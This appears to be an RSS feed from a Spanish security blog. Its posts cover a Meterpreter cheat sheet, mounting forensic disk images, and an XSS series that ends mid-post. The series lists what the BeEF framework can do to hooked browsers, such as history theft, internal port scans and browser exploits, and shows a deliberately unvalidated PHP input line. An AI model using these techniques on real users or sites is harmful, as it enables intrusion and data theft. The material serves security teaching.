<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-1226522460380785602</atom:id><lastBuildDate>Thu, 07 Jul 2011 23:36:14 +0000</lastBuildDate><category>Eventos</category><category>MacOS Security</category><category>Otros</category><category>Malware</category><category>Forensics</category><category>Auditorías Seguridad</category><category>LOPD</category><category>Ingenieria Social</category><category>Políticas Seguridad</category><category>Noticias</category><category>Linux</category><category>Formación</category><title>The Secure Corner</title><description>All topics about security</description><link>http://www.securecorner.net/</link><managingEditor>noreply@blogger.com (Ramon Vicens)</managingEditor><generator>Blogger</generator><openSearch:totalResults>69</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/TheSecureCorner" /><feedburner:info uri="thesecurecorner" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-1566314239495980865</guid><pubDate>Thu, 17 Jun 2010 21:37:00 +0000</pubDate><atom:updated>2010-06-17T23:37:08.997+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>Cheat Sheet de Meterpreter</title><description>&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande'; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px;"&gt;&lt;span class="Apple-style-span" style="font-family: Times;"&gt;&lt;span class="Apple-style-span" style="font-size: medium;"&gt;Nuevo &lt;a href="http://blueliv.blogspot.com/2010/06/meterpreter-cheat-sheet.html"&gt;Cheat Sheet de Meterpreter&lt;/a&gt; realizado por &lt;a href="http://www.blueliv.com/"&gt;blueliv&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Sin lugar a dudas un "Chuletario" muy útil para tener a mano !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Saludos,&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-1566314239495980865?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/TpvsR0kTB5o" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/TpvsR0kTB5o/cheat-sheet-de-meterpreter.html</link><author>noreply@blogger.com (Ramon Vicens)</author><feedburner:origLink>http://www.securecorner.net/2010/06/cheat-sheet-de-meterpreter.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-4586696305422350403</guid><pubDate>Sun, 09 May 2010 22:12:00 +0000</pubDate><atom:updated>2010-05-10T00:12:05.680+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Forensics</category><title>Métodos alternativos de análisis forense</title><description>&lt;div style="text-align: justify;"&gt;En ocasiones, duarante el desarrollo de un análisis forense postmortem, podemos requerir de la realización de una extracción masiva de documentos e información. Incluso, se podría requerir escanear el sistema en búsqueda de malware, como troyanos, spyware, backdoors, etc. &amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Por ello, podemos recurrir a la utilización de herramientas que nos permitan acceder al contenido de la imagen DD bajo análisis, pudiendo montar el contenido de sus particiones como carpetas o unidades de disco en nuestro sistema de análisis.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Cabe indicar, que es importante asegurarse siempre trabajar desde una copia de análisis, asegurándonos que disponemos de un backup de la imagen original. Además de trabajar desde una copia de la imagen, es conveniente asegurarse que las herramientas que vamos a utilizar permiten montar la imagen en modo de "solo lectura".&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Con el objetivo arriba indicado, disponemos de herramientas para:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li style="text-align: justify;"&gt;Montar las particiones contenidas en nuestra imagen DD para acceder al contenido de las mismas y así poder ser analizadas con más facilidad&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Realizar conversiones de formato DD a formato VMware/VirtualBox,... para poder disponer así de una máquina virtual a ser analizada. Ésta técnica es útil para análisis de ingeniería inversa si se ha confirmado que la máquina pudiera estar infectada.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Herramientas para montar particiones&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Las siguientes herramienas nos permiten montar a partir de una imagen DD una o todas las particiones que ésta misma contenga:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;Mount Image Pro&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;SmartMount&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;ImDisk&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Filedisk&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;mount (linux)&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Mientras que las 4 primeras herramientas son herramientas del entorno windows, también disponemos de la utilidad "mount" en sistemas UNIX, pudiendo montar la imagen DD como loopback, mediante el siguiente comando:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;mount -o ro,noexec,loop,offset=&lt;offset_en_bytes_de_inicio_de_particion&gt; imagen.dd /mnt/destino&lt;/offset_en_bytes_de_inicio_de_particion&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Herramientas para crear un disco virtua&lt;/b&gt;l&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;b&gt;Liveview:&lt;/b&gt; Permite a raíz de una imagen DD y una sencilla interfaz gráfica, la creación de una máquina virtual que usa como dico base la imagen en cuestión a analizar.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Qemu:&lt;/b&gt; Es un emulador y virtualizador genérico de CPU que permite la ejecución de sistemas operativos y aplicaciones de una máquina a otra. Sin embargo, podemos aprovechar la utilidad de conversión de formatos para convertir una imagen DD a una imagen vmdk, usando por ejemplo el siguiente comando:&lt;/li&gt;
&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="border-collapse: collapse; font-family: Arial, 'Liberation Sans', 'DejaVu Sans', sans-serif; font-size: 14px; line-height: 18px;"&gt;qemu-img convert imagendiscoendd.dd -O vmdk nombrediscovmdk.vmdk&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;li style="text-align: justify;"&gt;&lt;b&gt;VBoxManage:&lt;/b&gt; Pemite la creación de un disco virtual box a partir de una imagen DD. El siguiente comando, representa un ejemplo de cómo realizarlo:&lt;/li&gt;
&lt;ul&gt;&lt;li style="text-align: justify;"&gt;VBoxManage convertdd&amp;nbsp;&lt;span class="Apple-style-span" style="border-collapse: collapse; font-family: Arial, 'Liberation Sans', 'DejaVu Sans', sans-serif; font-size: 14px; line-height: 18px;"&gt;imagendiscoendd.dd&lt;/span&gt;&amp;nbsp;nombrediscovdi.vdi&lt;/li&gt;
&lt;/ul&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;Una vez creados nuestros discos virtuales, como es el caso de qemu y VBoxManage, tan solo deberemos crear una nueva máquina virtual que use el disco obtenido a partir de la imagen DD. Para ello, accederemos a las opciones avanzadas de creación de nuevas máquinas virtuales.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como alternativa, y si vamos con cuidado, podemos editar cualquier fichero VMX de una máquina virtual existente para realizar un cambio de disco. Veamos a continuación los ficheros que tiene una máquina virtual VMware:&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_cF66r39b8uc/S-csSN7GSuI/AAAAAAAAAJI/-XqKRFRuLG0/s1600/Picture+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_cF66r39b8uc/S-csSN7GSuI/AAAAAAAAAJI/-XqKRFRuLG0/s320/Picture+2.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;y a continuación, veamos el fichero .vmx que es el ficher de configuración de la máquina virtual:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S-cseeYWGUI/AAAAAAAAAJQ/zyV503gjkHA/s1600/Picture+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S-cseeYWGUI/AAAAAAAAAJQ/zyV503gjkHA/s320/Picture+3.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como podemos observar, esta máquina virtual dispone de un disco duro scsi, que podremos encontrar en la misma carpeta bajo el archivo binario "&lt;i&gt;Other Linux 2.6.x kernel0000001.vmdk&lt;/i&gt;".&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como hemos podido ver, las máquinas virtuales no son más que ficheros de texto con sus correpondientes ficheros binarios de disco o de memoria, entre otros. Por ello, cabe destacar que LiveView en el fondo lo que realiza es la automatización y creación de dichos ficheros mediante una interfaz amigable sin realizar conversión de la imagen DD a vmdk.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Saludos,&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-4586696305422350403?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/a5yI7GY9aCE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/a5yI7GY9aCE/metodos-alternativos-de-analisis.html</link><author>noreply@blogger.com (Ramon Vicens)</author><media:thumbnail url="http://4.bp.blogspot.com/_cF66r39b8uc/S-csSN7GSuI/AAAAAAAAAJI/-XqKRFRuLG0/s72-c/Picture+2.png" height="72" width="72" /><feedburner:origLink>http://www.securecorner.net/2010/05/metodos-alternativos-de-analisis.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-2506297587194171418</guid><pubDate>Wed, 14 Apr 2010 06:30:00 +0000</pubDate><atom:updated>2010-04-14T08:30:02.031+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>Cross Site Scripting III</title><description>&lt;div style="text-align: justify;"&gt;En los posts &lt;a href="http://www.securecorner.net/2010/03/la-problematica-de-los-cross-site_29.html"&gt;anteriores&lt;/a&gt; vimos cómo detectar XSS y evadir posibles filtros basados en listas negras de carácteres. Hoy, a modo de ejemplo, quiero presentar el &lt;a href="http://www.bindshell.net/tools/beef/"&gt;framework BeEF&lt;/a&gt; que dada una vulnerabilidad de cross site scripting, nos permitirá disponer de un conjunto de "bots" que se conectarán a su "botmaster" para ejecutar las órdenes indicadas por el mismo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Las funcionalidades que dispone BeEF por defecto son:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li style="text-align: justify;"&gt;&lt;b&gt;Módulo de autorun:&lt;/b&gt; Ejecución automática de determinados módulos javascript (Alert o Deface) cada vez que un bot se conecta contra el botmaster.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Clipboard:&lt;/b&gt; Módulo que permite obtener el contenido del portapapeles aprovechandose de características de Internet Explorer anterior a la versión 7.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Historial de navegación:&lt;/b&gt; Módulo que permite obtener el historial de navegación del bot usando técnicas de bruteforcing.&amp;nbsp;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Iniciación de peticiones:&lt;/b&gt; Desde el botmaster, podríamos iniciar peticiones HTTP en nombre del bot o bajo la identificación (IP, CNAME,... ) del zombie, permitiendo descargar cualquier tipo de software/malware.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Port Scaner:&lt;/b&gt; Escaneo de puertos de la red dónde está conectado el zombie, permitiendo así, realizar un escaneo de puertos de la red interna a través de una vulnerabilidad de cross site scripting.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Ejecución de exploits&lt;/b&gt; del navegador&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Inyección de código javascript:&lt;/b&gt; Permite la ejecución de culquier tipo de código desarrollado por uno mismo, permitiendo lanzar ataques no contemplados por BeEF.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;b&gt;Comunicación Inter-Protocol:&lt;/b&gt; Permite usar el navegador "infectado" como vía de comunicación con la red interna del zombie. Por ello, el "Content Body" HTTP será el protocolo con el que se desea dialogar, estableciendo un tunnel HTTP, ya que en la mayoría de casos, el protocolo destino obviará las cabeceras HTTP y se centrará en interpretar las cabeceras que viajan en el contenido del mensaje del mismo.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;Como prueba de concepto, he "infectado" una máquina cliente a través del formulario que vimos en los posts anteriores, realizando en éste caso una redirección/recarga de la URL mediante el siguiente código:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_cF66r39b8uc/S8T5B2rYOII/AAAAAAAAAJA/wq_htkiL66E/s1600/Picture+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_cF66r39b8uc/S8T5B2rYOII/AAAAAAAAAJA/wq_htkiL66E/s320/Picture+2.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Como se observa en la siguiente imagen, cuando el usuario navega hacia la URL vulnerable, es redirigido hacia el servidor web malicioso que dispone de los scripts BeEF que infectarán a la víctima.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_cF66r39b8uc/S8T1Dis7VHI/AAAAAAAAAIY/bU3vHunf3pU/s1600/Picture+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_cF66r39b8uc/S8T1Dis7VHI/AAAAAAAAAIY/bU3vHunf3pU/s320/Picture+1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;A continuación activamos el autorun, cerramos el navegador y volvemos a visitar el formulario vulnerable....&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S8T1WOWeFVI/AAAAAAAAAIg/HwBQVfIS8iU/s1600/Picture+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S8T1WOWeFVI/AAAAAAAAAIg/HwBQVfIS8iU/s320/Picture+3.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;a href="http://3.bp.blogspot.com/_cF66r39b8uc/S8T1asaOEAI/AAAAAAAAAIo/vTkpeqlMtEQ/s1600/Picture+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_cF66r39b8uc/S8T1asaOEAI/AAAAAAAAAIo/vTkpeqlMtEQ/s320/Picture+2.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Obtención del historial de navegación.....&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S8T1v3Kn6xI/AAAAAAAAAIw/wobrtoo42A4/s1600/Picture+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S8T1v3Kn6xI/AAAAAAAAAIw/wobrtoo42A4/s320/Picture+4.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Ejecución de exploits del navegador ...&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S8T11oPgi_I/AAAAAAAAAI4/684N-S3EIG4/s1600/Picture+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S8T11oPgi_I/AAAAAAAAAI4/684N-S3EIG4/s320/Picture+5.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Lo más fascinante es que todo esto lo podemos ejecutar mediante código javascript sin ser detectados por los dispositivos perimetrales, ya que éstos, no lo detectarán como malware!!&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En conclusión. En éstos últimos posts, hemos visto que a pesar que los cross site scripting no se consideran tan críticos como una inyección SQL, tienen mucha más importancia de la que a simple vista puede parecer, ya que como hemos visto, podríamos:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;Realizar un daño en la imagen corporativa de una empresa/organización y ocasionarle graves pérdidas económicas&lt;/li&gt;
&lt;li&gt;Obtener información de los zombies infectados&lt;/li&gt;
&lt;li&gt;Realizar escaneos de puertos de la red interna a través de los zombies&lt;/li&gt;
&lt;li&gt;Establecer comunicaciones con recursos internos en nombre de las máquinas zombie&lt;/li&gt;
&lt;li&gt;Infectar nuevas máquinas, abriendo nuevos canales de explotación&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;Saludos,&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1226522460380785602-2506297587194171418?l=www.securecorner.net' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/TheSecureCorner/~4/J6qxLOVrz-c" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/TheSecureCorner/~3/J6qxLOVrz-c/cross-site-scripting-iii.html</link><author>noreply@blogger.com (Ramon Vicens)</author><media:thumbnail url="http://2.bp.blogspot.com/_cF66r39b8uc/S8T5B2rYOII/AAAAAAAAAJA/wq_htkiL66E/s72-c/Picture+2.png" height="72" width="72" /><feedburner:origLink>http://www.securecorner.net/2010/04/cross-site-scripting-iii.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1226522460380785602.post-2512656888724289476</guid><pubDate>Mon, 29 Mar 2010 06:00:00 +0000</pubDate><atom:updated>2010-04-05T11:31:32.923+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Auditorías Seguridad</category><title>La problemática de los Cross Site Scripting II</title><description>&lt;div style="text-align: justify;"&gt;La semana pasada, estuve hablando sobre la &lt;a href="http://www.securecorner.net/2010/03/la-problematica-de-los-cross-site.html"&gt;problemática de los cross site scripting&lt;/a&gt;, repasando los principales ataques que se pueden realizar explotando una vulnerabilidad de éste tipo.&amp;nbsp;Esta semana, voy a poner algunos ejemplos al respecto.&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Por ello, he creado una aplicación muy sencilla que nos servirá como prueba de concepto. Consta de un campo de formulario que se envía por método GET hacia el servidor, el cual contiene una pequeña aplicación PHP vulnerable a inyección de javascript cuyo código fuente es el siguiente:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $var=$_GET['var1'];&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Como se puede observar, no se efectúa validación de los parámetros de entrada que provienen del usuario, fallando en la regla básica de seguridad de todo aplicativo.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Si realizamos una prueba inicial para comprobar qué filtrados realiza la aplicación, observamos lo siguiente:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Campo de fomulario que visualiza el usuario,&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S6-qlinBNPI/AAAAAAAAAHY/wjdRcYgNns0/s1600/Picture+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S6-qlinBNPI/AAAAAAAAAHY/wjdRcYgNns0/s320/Picture+6.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Valor de prueba que le insertamos ('"&lt;/span&gt;&lt;valor_escapado),&gt;&lt;/valor_escapado),&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_cF66r39b8uc/S6-qqq852oI/AAAAAAAAAHg/cLPuKgecYGo/s1600/Picture+7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_cF66r39b8uc/S6-qqq852oI/AAAAAAAAAHg/cLPuKgecYGo/s320/Picture+7.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Resultado obtenido y procesado por el código PHP anteriormente citado,&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_cF66r39b8uc/S6-qvZ4jWzI/AAAAAAAAAHo/_VTroY6q9v8/s1600/Picture+8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_cF66r39b8uc/S6-qvZ4jWzI/AAAAAAAAAHo/_VTroY6q9v8/s320/Picture+8.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Visualización del código fuente que ha devuelto el servidor,&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_cF66r39b8uc/S6-q0IeQPKI/AAAAAAAAAHw/rqbIUc1SuPs/s1600/Picture+9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_cF66r39b8uc/S6-q0IeQPKI/AAAAAAAAAHw/rqbIUc1SuPs/s320/Picture+9.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;Como se ha podido observar, el mismo PHP (depende de la versión), proporciona escape de carácteres potencialmente peligrosos (mediante contrabarras), como por ejemplo ' y ", evitando ataques de inyección de código XSS, SQL, ...&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
